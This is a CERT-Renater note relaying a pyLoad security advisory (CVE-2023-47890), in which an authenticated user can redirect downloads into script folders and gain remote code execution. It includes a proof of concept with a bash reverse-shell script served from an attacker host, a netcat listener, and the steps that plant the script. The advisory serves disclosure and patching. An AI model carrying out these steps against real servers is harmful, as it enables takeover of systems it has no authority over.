===================================================================== CERT-Renater Note d'Information No. 2023/VULN484 _____________________________________________________________________ DATE : 27/11/2023 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running pyLoad versions prior to 0.5.0b3.dev75. ===================================================================== https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2 _____________________________________________________________________ Download to arbitrary folder can lead to RCE High GammaC0de published GHSA-h73m-pcfw-25h2 Package pyLoad Affected versions 0.5.0 Patched versions 0.5.0b3.dev75 Description Summary I found a security issue with pyLoad 0.5.0 where a web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts. Details When a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a filter is applied to make sure it can't traverse directories and stays within /downloads. src/pyload/core/api/init.py::add_package::L432 folder = ( folder.replace("http://", "") .replace("https://", "") .replace(":", "") .replace("/", "_") .replace("\\", "_") ) So if a package were created with the name "../" the application would instead create the folder "/downloads/.._/" However, when editing packages there is no prevention in place and a user can just pick any arbitrary directory in the filesystem. src/pyload/webui/app/blueprints/json_blueprint.py::edit_package::L195 id = int(flask.request.form["pack_id"]) data = { "name": flask.request.form["pack_name"], "_folder": flask.request.form["pack_folder"], "password": flask.request.form["pack_pws"], } api.set_package_data(id, data) Steps to reproduce Login to a pyLoad instance Go to "Queue" and create a new package with any name and a valid link Click "Edit Package" on the newly created package and set the folder as "/config/scripts/download_finished/" Restart the package Check the server filesystem and note the link was downloaded and stored inside "/config/scripts/download_finished/" Remote code execution proof-of-concept It is possible to use this issue to abuse scripts and gain remote control over the pyLoad server. On attacker machine Start a web server hosting a malicious script echo -e '#!/bin/bash\nbash -i >& /dev/tcp//9999 0>&1' > evil.sh&1 sudo python3 -m http.server 80 Start netcat listener for reverse shells nc -vklp 9999 On pyLoad Change pyLoad file permission settings Change permissions of downloads: On Permission mode for downloaded files: 0744 Create a package with link pointing to the attacker http:///evil.sh Edit package and change folder to /config/scripts/package_deleted/ Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad Delete any package package to trigger the script Impact An authenticated user can gain control over the underlying pyLoad server. Severity High 7.6/ 10 CVSS base metrics Attack vector Adjacent Attack complexity High Privileges required High User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H CVE ID CVE-2023-47890 Weaknesses CWE-22 Credits @vergl4s vergl4s Reporter ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================